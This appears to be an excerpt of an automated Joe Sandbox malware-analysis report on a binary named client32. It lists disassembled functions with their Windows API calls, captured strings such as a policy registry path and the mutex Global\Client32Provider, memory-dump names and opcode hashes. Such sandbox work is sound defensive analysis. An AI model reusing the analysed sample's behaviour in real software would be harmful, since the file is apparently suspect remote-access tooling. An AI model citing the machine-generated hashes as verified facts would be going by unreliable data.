                                                                                                                                                    • Opcode ID: 6da951efbfc87db6ece2d1a25a630200d6c073fb490d851d412b640ddb2e2f8a
                                                                                                                                                    • Instruction ID: ca87d18320adad33a834d8cb277fb2ace37061aefdd10bcd2fd950a8e6c1b163
                                                                                                                                                    • Opcode Fuzzy Hash: 6da951efbfc87db6ece2d1a25a630200d6c073fb490d851d412b640ddb2e2f8a
                                                                                                                                                    • Instruction Fuzzy Hash: C031C271A04309BFD7108F69CC49FABBBB9EF46714F14C156F945AB280D670AD09CB90
                                                                                                                                                    Function 110CF7D0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110CEDF0: EnterCriticalSection.KERNEL32(00000000,00000000,1EF76653,00000000,00000000,00000000,110CF110,?,00000001), ref: 110CEE2A
                                                                                                                                                      • Part of subcall function 110CEDF0: LeaveCriticalSection.KERNEL32(00000000), ref: 110CEE92
                                                                                                                                                    • IsWindow.USER32(?), ref: 110CF82B
                                                                                                                                                      • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                                                                                                    • RemovePropA.USER32(?), ref: 110CF858
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 110CF86C
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 110CF876
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 110CF880
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DeleteObject$CriticalSection$CurrentEnterLeavePropRemoveThreadWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1921910413-0
                                                                                                                                                    • Opcode ID: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
                                                                                                                                                    • Instruction ID: ad97ac124b8baf06b1bc187428558142c09e0612fd1a0aa1ed86d22d24e6cfad
                                                                                                                                                    • Opcode Fuzzy Hash: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
                                                                                                                                                    • Instruction Fuzzy Hash: 0C316BB1A007559BDB20DF69D940B5BBBE8EB04B18F000A6DE862D3690D775E404CBA2
                                                                                                                                                    Function 11081590 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • ..\CTL32\DataStream.cpp, xrefs: 1108165E
                                                                                                                                                    • %02x, xrefs: 11081610
                                                                                                                                                    • m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081647
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                    • String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
                                                                                                                                                    • API String ID: 2111968516-476189988
                                                                                                                                                    • Opcode ID: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                                                                                    • Instruction ID: 5a57582845b686d446ddd06a6d519ab032a036b4d7a2f4ef603709a16adc2e93
                                                                                                                                                    • Opcode Fuzzy Hash: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                                                                                    • Instruction Fuzzy Hash: 8621F371E412599FDB24CF65DDC0EAAF3F8EF48304F0486AEE51A97940EA70AD44CB60
                                                                                                                                                    Function 1111F440 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1111AAA0: DeleteObject.GDI32(?), ref: 1111AAD6
                                                                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1111F516
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DeleteObject$PaletteSelect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2820294704-0
                                                                                                                                                    • Opcode ID: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                                                                                                    • Instruction ID: f40c181d7eb29f9f1a68c60cce03c48cde81027a9113fa9449142c78dfeb9332
                                                                                                                                                    • Opcode Fuzzy Hash: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                                                                                                    • Instruction Fuzzy Hash: 7B219076A04517ABD7049F78D9C46AAF7A8FB18318F11023AE91DDB204CB35BC558BD1
                                                                                                                                                    Function 1104F179 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 69sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CAB
                                                                                                                                                      • Part of subcall function 11034C90: SetForegroundWindow.USER32(?), ref: 11034CB5
                                                                                                                                                      • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CDF
                                                                                                                                                      • Part of subcall function 11034C90: Sleep.KERNEL32(00000032), ref: 11034CE9
                                                                                                                                                    • Sleep.KERNEL32(00000032,LegalNoticeText,?,?,LegalNoticeCaption,?,?,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F191
                                                                                                                                                    • GetLastError.KERNEL32(00000000,Global\Client32Provider,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F1DF
                                                                                                                                                    • Sleep.KERNEL32(00000032,?,?,0000004A,00000000,?), ref: 1104F33D
                                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 1104F383
                                                                                                                                                    Strings
                                                                                                                                                    • error opening ipc lap %d to logon, e=%d, %s, xrefs: 1104F1E7
                                                                                                                                                    • Global\Client32Provider, xrefs: 1104F1BB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep$EnumWindows$ErrorForegroundLastWindow
                                                                                                                                                    • String ID: Global\Client32Provider$error opening ipc lap %d to logon, e=%d, %s
                                                                                                                                                    • API String ID: 3682529815-1899068400
                                                                                                                                                    • Opcode ID: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                                                                                                    • Instruction ID: 6aab5bd338832a8b6cc9a825996d00e4c24ed17e7d33d91b3ba03cdb4d861036
                                                                                                                                                    • Opcode Fuzzy Hash: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                                                                                                    • Instruction Fuzzy Hash: BC212638D4425ACED715DBA4CD98BECB760EB9630AF2001FDD85A97590EF302A45CB12
                                                                                                                                                    Function 11163964 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _malloc.LIBCMT ref: 11163972
                                                                                                                                                      • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                                                                                      • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                                                                                      • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                                                                    • _free.LIBCMT ref: 11163985
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap_free_malloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1020059152-0
                                                                                                                                                    • Opcode ID: 038951e35deccbe33e424bc6d0b6b01cb88aea4f76c9cdef2cbfb9def4edf244
                                                                                                                                                    • Instruction ID: 99a0502aaeb7ade96a4deef53194f79690bd7c081ca6f8299ad08a7ab0eaa67e
                                                                                                                                                    • Opcode Fuzzy Hash: 038951e35deccbe33e424bc6d0b6b01cb88aea4f76c9cdef2cbfb9def4edf244
                                                                                                                                                    • Instruction Fuzzy Hash: 6D110837618637AADB121B74A808649FB9CAF843F8B214126E85D96140FEB2D460CF90
                                                                                                                                                    Function 110B3950 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B395F
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B397E
                                                                                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 110B39A7
                                                                                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 110B39AD
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,1104362F,?,?,?), ref: 110B39DB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$LeaveMetricsSystem$Enter
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4125181052-0
                                                                                                                                                    • Opcode ID: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
                                                                                                                                                    • Instruction ID: 2eabc0a5c64141517199ab689f696fc8c069b56ecca888d5095ec5d0d1156609
                                                                                                                                                    • Opcode Fuzzy Hash: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
                                                                                                                                                    • Instruction Fuzzy Hash: 6F11B132600608DFD314CF79C9849AAFBE5FFD8314B20866ED51A87614EB72E806CB80
                                                                                                                                                    Function 6CAA6CFE Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __getptd.LIBCMT ref: 6CAA6D0A
                                                                                                                                                      • Part of subcall function 6CAA6F64: __getptd_noexit.LIBCMT ref: 6CAA6F67
                                                                                                                                                      • Part of subcall function 6CAA6F64: __amsg_exit.LIBCMT ref: 6CAA6F74
                                                                                                                                                    • __getptd.LIBCMT ref: 6CAA6D21
                                                                                                                                                    • __amsg_exit.LIBCMT ref: 6CAA6D2F
                                                                                                                                                    • __lock.LIBCMT ref: 6CAA6D3F
                                                                                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 6CAA6D53
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 938513278-0
                                                                                                                                                    • Opcode ID: 619e77e11d83499253cd74d4f7745032b57662a38278548b034a5566e3ea2f3b
                                                                                                                                                    • Instruction ID: 1700565f9dbfdcb8caf2f0c3ce8a1bcf3655a3d24f7e0dbc5607fe8e04ad2515
                                                                                                                                                    • Opcode Fuzzy Hash: 619e77e11d83499253cd74d4f7745032b57662a38278548b034a5566e3ea2f3b
                                                                                                                                                    • Instruction Fuzzy Hash: 0AF06D32A05B109BDA15AFFC5A0278E77A0AF0476DF10860DE554E7BC0DB2489CBCE56
                                                                                                                                                    Function 11171306 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __getptd.LIBCMT ref: 11171312
                                                                                                                                                      • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                                                                                      • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                                                                                                    • __getptd.LIBCMT ref: 11171329
                                                                                                                                                    • __amsg_exit.LIBCMT ref: 11171337
                                                                                                                                                    • __lock.LIBCMT ref: 11171347
                                                                                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 1117135B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 938513278-0
                                                                                                                                                    • Opcode ID: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                                                                                                    • Instruction ID: 9cb08520484339131e966c5afe67267813abc49f95b778b0e1eea255b6adbda5
                                                                                                                                                    • Opcode Fuzzy Hash: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                                                                                                    • Instruction Fuzzy Hash: 67F0243AD04322DAE7119BB88801B5CF7A16F0073CF110249D814A77C0CFA47810CB5B
                                                                                                                                                    Function 11053280 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                                                                      • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                                                                      • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                                                                      • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                                                                      • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                                                                      • Part of subcall function 11145410: GetSystemMetrics.USER32(0000005E), ref: 1114542A
                                                                                                                                                      • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC387
                                                                                                                                                      • Part of subcall function 110CC360: GetWindowRect.USER32(00000000), ref: 110CC38A
                                                                                                                                                      • Part of subcall function 110CC360: MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110CC39C
                                                                                                                                                      • Part of subcall function 110CC360: MapDialogRect.USER32(00000000,?), ref: 110CC3C8
                                                                                                                                                      • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC401
                                                                                                                                                      • Part of subcall function 110CC360: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000010), ref: 110CC41C
                                                                                                                                                      • Part of subcall function 110183B0: GetSystemMetrics.USER32(0000005E), ref: 110183BF
                                                                                                                                                      • Part of subcall function 110183B0: GetSystemMetrics.USER32(00002003), ref: 110183DF
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 11053483
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 11053498
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
